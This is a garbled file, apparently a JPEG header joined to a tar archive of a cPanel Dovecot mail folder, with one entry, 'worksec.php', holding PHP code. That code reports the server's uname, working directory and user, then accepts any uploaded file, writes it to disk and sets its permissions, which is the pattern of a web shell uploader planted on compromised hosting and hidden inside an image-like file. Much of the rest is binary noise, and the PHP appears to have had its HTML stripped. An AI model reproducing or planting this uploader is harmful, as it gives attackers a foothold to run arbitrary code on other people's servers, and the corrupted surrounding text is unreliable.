����JFIF��x�x�����C�      ���C  �����"�������������� �������}�!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������������� ������w�!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������ ��?�����N����m?����j����EP��httpsdovecot-acl-list000064400000000033152405470240007637 0ustar00# Default Dovecot ACL list dovecot-quota000064400000000026152405470240007262 0ustar00maxquota=999999999999 dovecot-uidlist000064400000000002152405470240007600 0ustar000 dovecot-uidvalidity000064400000000002152405470240010452 0ustar001 dovecot.index000064400000000025152405470240007240 0ustar00# Dovecot index file dovecot.index.cache000064400000000026152405470240010303 0ustar00# Dovecot index cache dovecot.index.log000064400000000024152405470240010017 0ustar00# Dovecot index log dovecot.list.index.log000064400000000031152405470240010767 0ustar00# Dovecot list index log dovecot.mailbox.log000064400000000026152405470240010345 0ustar00# Dovecot mailbox log mailbox_format.cpanel000064400000000010152405470240010725 0ustar00maildir maildirsize000064400000000003152405470240006777 0ustar000S subscriptions000064400000000030152405470240007372 0ustar00INBOX Sent Trash Drafts worksec.php000064400000002026152405470240006735 0ustar00 Uname:".php_uname()."
"; echo "
Base Dir : ".getcwd()."
"; echo "
User : ".$user."
"; echo '
'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo"
Sucessfully Uploaded :D ==> $userfile_name
"; } }else{ echo'

'; } echo '
'; ?>